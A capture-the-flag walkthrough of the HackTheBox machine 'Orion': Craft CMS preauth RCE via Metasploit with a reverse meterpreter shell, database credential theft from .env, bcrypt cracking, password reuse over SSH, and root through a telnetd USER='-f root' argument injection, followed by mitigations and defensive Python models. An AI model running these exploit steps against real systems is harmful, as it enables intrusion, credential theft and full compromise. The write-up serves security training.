Executive Summary
Orion is a Linux-based HackTheBox machine that demonstrates multiple critical vulnerabilities in web applications and system services. The challenge chain involves exploiting a preauthentication Remote Code Execution vulnerability in Craft CMS (CVE-2025-32432), extracting database credentials, cracking weak password hashes, and finally escalating privileges through a GNU InetUtils telnetd argument injection vulnerability (CVE-2026-24061).
Difficulty: Easy
OS: Linux
Key Vulnerabilities:
- CVE-2025-32432: Craft CMS Unauthenticated RCE
- CVE-2026-24061: GNU InetUtils telnetd Argument Injection RCE
Reconnaissance & Enumeration
Network Scanning
First, let's identify what services are running on the target:
nmap -A -Pn <TARGET_IP>
Output Summary:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.15
80/tcp open http nginx 1.18.0 (Ubuntu)
Analysis: The target has SSH (port 22) and HTTP (port 80) open. The HTTP service redirects to a domain orion.htb, so we add it to our hosts file:
echo '<TARGET_IP> orion.htb' >> /etc/hosts
Web Application Reconnaissance
Visiting http://orion.htb/ reveals a professional telecommunications company website ("Orion Telecom"). The main page shows:
Reliable Connectivity for Governments and Global Enterprises
Orion Telecom delivers secure, high-performance networks connecting government
agencies, large corporations, and critical services.
This is a static landing page with limited information. We need to find administrative interfaces:
feroxbuster -u http://orion.htb/ -C 403,404
Key Findings:
302 GET 0l 0w 0c http://orion.htb/admin => http://orion.htb/admin/login
200 GET 385l 1182w 12272c http://orion.htb/
200 GET 929l 1619w 17370c http://orion.htb/assets/css/style.css
200 GET 178l 431w 5420c http://orion.htb/assets/js/main.js
301 GET 7l 12w 178c http://orion.htb/assets => http://orion.htb/assets/
Critical Discovery: Found /admin/login which redirects to the administration panel. Navigating to http://orion.htb/admin/login, we see:
Orion Telecom Administration
Internal Website Management Portal
Version Leakage: At the bottom of the login page, we see:
craft cms
Craft CMS 5.6.16
This version information is crucial for vulnerability research.
Initial Access: CVE-2025-32432 Exploitation
Vulnerability Research
With the Craft CMS version identified (5.6.16), we search for known vulnerabilities affecting this version. CVE-2025-32432 is a pre-authentication Remote Code Execution vulnerability that affects Craft CMS versions up to 5.6.x.
Available Metasploit Module
Metasploit has a built-in exploit for this vulnerability:
msfconsole
msf > search craft cms
Available Exploits:
[1] exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
Craft CMS Image Transform Preauth RCE (CVE-2025-32432)
Rank: excellent | Check: Yes
Module Configuration
Load and configure the exploit module:
msf > use 1
Display Current Options:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > options
Output:
Module options (exploit/linux/http/craftcms_preauth_rce_cve_2025_32432):
Name Current Setting Required Description
---- --------------- -------- -----------
ASSET_ID 75 yes Existing asset ID
RHOSTS yes The target host(s)
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.29.189 yes The listen address
LPORT 4444 yes The listen port
Configuration Steps:
Set the target host and port:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set RHOSTS <TARGET_IP>
RHOSTS => <TARGET_IP>
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set RPORT 80
RPORT => 80
Set your listener (attacker) IP and port:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set LHOST tun0
LHOST => <YOUR_IP>
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set LPORT 4444
LPORT => 4444
Initial Exploitation Attempt
First attempt without the admin URL path:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > run
Result:
[*] Started reverse TCP handler on <YOUR_IP>:4444
[*] Running automatic check
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability.
Could not retrieve session & CSRF token
Analysis: The exploit couldn't retrieve the CSRF token, likely because we need to specify the admin path. Update RHOSTS:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set RHOSTS http://orion.htb/admin/login
RHOSTS => http://orion.htb/admin/login
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > run
Successful Exploitation:
[*] Started reverse TCP handler on <YOUR_IP>:4444
[*] Running automatic check
[+] Leaked session.save_path: /var/lib/php/sessions
[+] The target is vulnerable. Session path leaked
[*] Injecting stub & triggering payload...
[*] Sending stage (45739 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<YOUR_IP>:4444 -> <TARGET_IP>:54622)
at 2026-06-26 12:37:45 -0400
Shell Access
Access a shell through the meterpreter session:
meterpreter > shell
Process 1508 created.
Channel 0 created.
This drops us into a shell running as the www-data user (the web server process).
Post-Exploitation: Database Access & Credential Extraction
Navigating to Craft CMS Installation
With shell access, let's explore the file system:
www-data@orion:~/html/craft$ ls -la
Output:
total 364
drwxrwxr-x 7 www-data www-data 4096 Mar 6 11:22 .
-rw-rw-r-- 1 www-data www-data 718 Mar 6 11:24 .env
-rw-rw-r-- 1 www-data www-data 411 Nov 18 2025 .env.example.dev
... [other files]
-rwxr-xr-x 1 www-data www-data 309 Nov 18 2025 craft
Extracting Database Credentials
The .env file contains configuration secrets:
www-data@orion:~/html/craft$ cat .env
Output:
CRAFT_APP_ID=CraftCMS--67912ad2-1f1b-4993-bfec-e64daa5c23ff
CRAFT_ENVIRONMENT=dev
CRAFT_SECURITY_KEY=RRS86F6i2JQKdC6kfEI7frVxA47WVMx8
CRAFT_DEV_MODE=true
CRAFT_ALLOW_ADMIN_CHANGES=true
CRAFT_DISALLOW_ROBOTS=true
CRAFT_DB_DRIVER=mysql
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=orion
CRAFT_DB_USER=root
CRAFT_DB_PASSWORD=SuperSecureCraft123Pass!
PRIMARY_SITE_URL=http://orion.htb/
Critical Information Obtained:
- Database: MariaDB on localhost:3306
- Database name: orion
- Username: root
- Password: SuperSecureCraft123Pass!
Accessing the Database
Connect to MariaDB with extracted credentials:
www-data@orion:~/html/craft$ mysql -u root -p'SuperSecureCraft123Pass!'
Connection Successful:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 42658
Server version: 10.6.23-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Extracting User Credentials
Query the users table:
MariaDB [orion]> use orion;
Database changed
MariaDB [orion]> SELECT CONCAT(username, ':', password) FROM users;
Output:
+--------------------------------------------------------------------+
| CONCAT(username, ':', password) |
+--------------------------------------------------------------------+
| admin:$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS |
+--------------------------------------------------------------------+
1 row in set (0.001 sec)
Credentials Extracted:
- Username: admin
- Password Hash: $2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS (bcrypt)
Credential Cracking
Hash Identification
The hash format is bcrypt (indicated by the $2y$13$ prefix):
- $2y$ = bcrypt algorithm variant
- 13 = cost factor, i.e. 2^13 iterations (8192)
Using John the Ripper
Save the hash to a file:
root@kali:~# cat > admin.hash << 'EOF'
admin:$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS
EOF
Crack the password using rockyou.txt wordlist:
root@kali:~# john admin.hash --wordlist=/usr/share/wordlists/rockyou.txt
Output:
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
darkangel (admin)
1g 0:00:00:27 DONE (2026-06-26 12:53) 0.03664g/s 26.38p/s 26.38c/s 26.38C/s gloria..marissa
Cracked Credentials:
- Username: admin
- Password: darkangel
Lateral Movement: SSH Access
Attempting SSH as adam
The cracked password is likely used by another user on the system. Let's try SSH:
root@kali:~# ssh adam@orion.htb
Interactive Prompt:
The authenticity of host 'orion.htb (<TARGET_IP>)' can't be established.
ED25519 key fingerprint is: SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Password Authentication:
adam@orion.htb's password: darkangel
Successful SSH Connection:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-177-generic x86_64)
...
adam@orion:~$ whoami
adam
adam@orion:~$ id
uid=1000(adam) gid=1000(adam) groups=1000(adam)
User Flag
adam@orion:~$ cat user.txt
[REDACTED - User Flag Hash]
Privilege Escalation: CVE-2026-24061
Reconnaissance: Open Services
Check listening services on the system:
adam@orion:~$ ss -tulnp
Output:
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* (mysql)
tcp LISTEN 0 4096 127.0.0.53:53 0.0.0.0:* (DNS)
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:* (nginx)
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* (sshd)
tcp LISTEN 0 10 127.0.0.1:23 0.0.0.0:* (telnet)
Critical Finding: Telnetd is listening on port 23 (127.0.0.1:23). This is unusual and indicates a potential vulnerability vector.
Checking Telnetd Version
adam@orion:~$ telnet --version
Output:
telnet (GNU inetutils) 2.7
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change, modify, and redistribute it.
Vulnerability Analysis: GNU InetUtils version 2.7 is vulnerable to CVE-2026-24061, an argument injection vulnerability in telnetd.
Understanding CVE-2026-24061
Vulnerability Details:
GNU InetUtils telnetd delegates authentication to /usr/bin/login by constructing a command line that includes the USER environment variable. The vulnerability stems from unsafe string interpolation using a %U placeholder that was added in 2015.
The Attack Chain:
- Telnetd receives a connection and reads the USER environment variable from the Telnet protocol (set via the NEW_ENVIRON option)
- The USER value is directly interpolated into the login command without sanitization
- An attacker can set USER="-f root" to inject the -f flag (force login without authentication)
- The constructed command becomes: /usr/bin/login -h [hostname] "-f root"
- The -f root arguments force login to grant shell access to the root user without password verification
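To make the root cause concrete, here is an added Python model of the interpolation pattern described above next to a hardened builder (this is illustrative code written for this writeup, not InetUtils' telnetd source; the LOGIN_TEMPLATE string is an assumed stand-in for the real %U template). It shows how a dash-led USER value becomes an option word, and how validating the name and passing it as a single argv element prevents that.

```python
import re
import shlex

# Template in the style of the vulnerable telnetd: %h is the client host and %U
# the USER value supplied by the Telnet client through NEW_ENVIRON.
# The template string is an assumption for this model, not InetUtils' own.
LOGIN_TEMPLATE = "/usr/bin/login -h %h %U"

def build_argv_vulnerable(template, hostname, user):
    """Textual substitution followed by word splitting: the user-controlled
    value can contribute extra argv words, including option flags."""
    cmdline = template.replace("%h", hostname).replace("%U", user)
    return shlex.split(cmdline)

# POSIX portable username syntax: starts with a letter or underscore, then
# letters, digits, underscore or hyphen, at most 32 characters.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")

def is_safe_username(user):
    return USERNAME_RE.match(user) is not None

def build_argv_hardened(hostname, user):
    """Validate, then pass the name as exactly one argv element after '--'
    (getopt convention: '--' ends option parsing)."""
    if not is_safe_username(user):
        raise ValueError("rejected USER value: %r" % user)
    return ["/usr/bin/login", "-h", hostname, "--", user]

def injected_options(template, hostname, user):
    """Audit helper: option words present in the vulnerable argv that are not
    part of the template itself, i.e. flags smuggled in through USER."""
    baseline = {w for w in template.split() if w.startswith("-")}
    argv = build_argv_vulnerable(template, hostname, user)
    return [w for w in argv if w.startswith("-") and w not in baseline]

if __name__ == "__main__":
    for value in ("adam", "-f root"):
        print(value, "->", build_argv_vulnerable(LOGIN_TEMPLATE, "client", value),
              "injected:", injected_options(LOGIN_TEMPLATE, "client", value))
        try:
            print("hardened:", build_argv_hardened("client", value))
        except ValueError as e:
            print("hardened:", e)
```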
Exploitation
Set the USER environment variable and connect via telnet:
adam@orion:~$ USER="-f root" telnet 127.0.0.1 23
Connection:
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
System Message (no password prompt):
Linux 5.15.0-177-generic (orion) (pts/3)
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-177-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri Jun 26 05:01:59 PM UTC 2026
System load: 0.0 Processes: 236
Usage of /: 81.4% of 5.81GB Users logged in: 1
Memory usage: 16% IPv4 address for eth0: <TARGET_IP>
Swap usage: 0%
Immediate Root Shell (no authentication):
root@orion:~# whoami
root
root@orion:~# id
uid=0(root) gid=0(root) groups=0(root)
Root Flag
root@orion:~# cat root.txt
[REDACTED - Root Flag Hash]
Attack Chain Summary
The complete exploitation chain can be visualized as follows:
┌─────────────────────────────────────────────────────────────────┐
│ 1. RECONNAISSANCE │
├─────────────────────────────────────────────────────────────────┤
│ • Network scan reveals HTTP (port 80) and SSH (port 22) │
│ • Web directory enumeration finds /admin/login │
│ • Version leakage: Craft CMS 5.6.16 discovered │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 2. INITIAL ACCESS (CVE-2025-32432) │
├─────────────────────────────────────────────────────────────────┤
│ • Exploit: Craft CMS Preauth RCE via Image Transform │
│ • Impact: Remote code execution as www-data user │
│ • Meterpreter/shell access achieved │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 3. CREDENTIAL EXTRACTION │
├─────────────────────────────────────────────────────────────────┤
│ • Access to .env file reveals DB credentials │
│ • Connect to MariaDB as root user │
│ • Extract admin bcrypt password hash from users table │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 4. PASSWORD CRACKING │
├─────────────────────────────────────────────────────────────────┤
│ • John the Ripper cracks bcrypt hash in ~27 seconds │
│ • Password: darkangel │
│ • Reused credential for adam user account │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 5. LATERAL MOVEMENT (USER FLAG) │
├─────────────────────────────────────────────────────────────────┤
│ • SSH login as adam user with cracked password │
│ • User flag obtained: [REDACTED] │
│ • Interactive shell access established │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 6. PRIVILEGE ESCALATION (CVE-2026-24061) │
├─────────────────────────────────────────────────────────────────┤
│ • Telnetd service discovered on port 23 │
│ • GNU InetUtils 2.7 vulnerable to argument injection │
│ • Exploit: Set USER="-f root" during telnet connection │
│ • Result: Direct root shell without authentication │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 7. SYSTEM COMPROMISE (ROOT FLAG) │
├─────────────────────────────────────────────────────────────────┤
│ • Root privilege level achieved │
│ • Root flag obtained: [REDACTED] │
│ • Complete system control │
└─────────────────────────────────────────────────────────────────┘
Key Vulnerabilities
1. CVE-2025-32432: Craft CMS Preauth RCE
CVSS Score: 9.8 (Critical)
Description: Craft CMS versions up to 5.6.16 contain an unauthenticated remote code execution vulnerability in the image transform functionality. The vulnerability allows an attacker to inject and execute arbitrary PHP code without authentication.
Attack Vector: Network-based, no credentials required
Affected Versions: Craft CMS <= 5.6.16
Mitigation:
- Upgrade to patched version (5.6.17+)
- Implement input validation on image transform parameters
- Restrict file upload permissions
2. Weak Credential Management
Issue: Database credentials stored in plaintext in .env file
Risk: Compromise of all application data and authentication
Mitigation:
- Use environment variables from secure vaults (HashiCorp Vault, AWS Secrets Manager)
- Restrict file permissions (chmod 600)
- Implement principle of least privilege for database user
- Use separate database credentials for different environments
3. Weak Password Hashing Configuration
Issue: Bcrypt with only 2^13 iterations (default)
Risk: Password cracking possible in seconds with modern hardware
Mitigation:
- Increase iteration count to 2^15 or higher
- Consider using modern algorithms like Argon2
- Enforce strong password policies
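The cost factor discussed under Hash Identification and in this mitigation can be audited directly from a users-table dump. The following added Python script (written for this writeup, not part of Craft CMS or John the Ripper) parses bcrypt strings, flags any hash below a policy floor of cost 15, and projects how the observed cracking rate changes with the cost; the sample rows other than the admin entry are constructed.

```python
import re

# bcrypt modular-crypt format: $2a$ / $2b$ / $2y$, two-digit cost, 22-char salt,
# 31-char digest, all in bcrypt's ./A-Za-z0-9 alphabet.
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

# Policy floor used by this audit; the writeup recommends a cost of 15 or higher.
MIN_COST = 15

def parse_bcrypt(h):
    """Return (variant, cost, iterations) or raise ValueError if h is not bcrypt."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash")
    variant, cost = m.group(1), int(m.group(2))
    if not 4 <= cost <= 31:
        raise ValueError("bcrypt cost outside 4..31")
    return variant, cost, 2 ** cost

def audit_rows(rows, min_cost=MIN_COST):
    """rows are 'username:hash' lines as dumped from the users table.
    Returns a list of (username, cost or None, verdict)."""
    report = []
    for line in rows:
        user, _, h = line.strip().partition(":")
        try:
            _, cost, _ = parse_bcrypt(h)
        except ValueError:
            report.append((user, None, "not-bcrypt"))
            continue
        report.append((user, cost, "ok" if cost >= min_cost else "weak"))
    return report

def expected_rate(observed_rate, observed_cost, new_cost):
    """Guesses per second to expect at new_cost given a rate measured at
    observed_cost: bcrypt work doubles with each cost step."""
    return observed_rate / 2 ** (new_cost - observed_cost)

# Constructed sample: the admin row from the writeup, a cost-15 row and a
# non-bcrypt row (the last two are synthetic values, not from the target).
SAMPLE_ROWS = [
    "admin:$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS",
    "svc:$2b$15$" + "a" * 22 + "b" * 31,
    "legacy:5f4dcc3b5aa765d61d8327deb882cf99",
]

if __name__ == "__main__":
    for user, cost, verdict in audit_rows(SAMPLE_ROWS):
        print("%-8s cost=%-4s %s" % (user, cost, verdict))
    # John measured 26.38 c/s at cost 13 in the writeup; cost 15 cuts that 4x.
    print("expected c/s at cost 15: %.2f" % expected_rate(26.38, 13, 15))
```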
4. CVE-2026-24061: GNU InetUtils Telnetd Argument Injection
CVSS Score: 10.0 (Critical)
Description: GNU InetUtils telnetd versions through 2.7 unsafely interpolate user-provided data (USER environment variable) into the login command without sanitization. This allows argument injection to force authentication bypass.
Attack Vector: Local network access to telnet port (typically port 23)
Affected Versions: GNU InetUtils <= 2.7
Root Cause: Unsafe use of %U placeholder in command template that was added in 2015
Exploitation Method:
USER="-f root" telnet target_ip 23
# Results in command: /usr/bin/login -h [hostname] "-f root"
# The -f flag forces immediate shell without authentication
Mitigation:
- Upgrade GNU InetUtils to patched version (2.8+)
- Disable telnetd if not required (use SSH instead)
- Implement firewall rules to restrict telnet access
- Sanitize/validate all user input before command interpolation
5. Unnecessary Service Exposure
Issue: Telnet service running and accessible
Risk: Exposed to multiple categories of vulnerabilities, obsolete protocol
Mitigation:
- Disable telnetd entirely (use SSH only)
- If required, restrict network access via firewall
- Implement strong authentication on any enabled service
Lessons Learned & Best Practices
1. Defense in Depth Failure
The system had multiple layers of failure:
- Vulnerable web application (CVE-2025-32432)
- Exposed credentials in configuration file
- Weak password hashing
- Unnecessary network services with critical vulnerabilities
Lesson: Security must be implemented at multiple layers. A single vulnerability should not lead to complete compromise.
2. Credential Reuse
The password cracked from the database was reused for the adam user account, enabling lateral movement.
Best Practice: Never reuse passwords across different accounts or systems.
3. Version Disclosure
The Craft CMS version was disclosed in the HTML footer, enabling targeted exploit selection.
Best Practice: Hide version information in production environments. Remove debug information from error pages and comments.
4. Weak Configuration Management
Database credentials in plaintext files and over-permissioned telnetd service.
Best Practice:
- Use secure credential management systems
- Follow principle of least privilege
- Regular security audits of configuration files
5. Telnet Protocol Obsolescence
Telnet is an obsolete protocol with inherent security issues and recent critical vulnerabilities.
Best Practice: Use SSH exclusively for remote administration. Disable telnet entirely.
Tools Used
| Tool | Purpose |
|---|---|
| Nmap | Network service enumeration |
| Feroxbuster | Web directory discovery |
| Metasploit Framework | Exploit delivery and payload staging |
| MySQL Client | Database interrogation |
| John the Ripper | Password hash cracking |
| SSH | Secure remote access |
| Telnet | Exploit delivery for CVE-2026-24061 |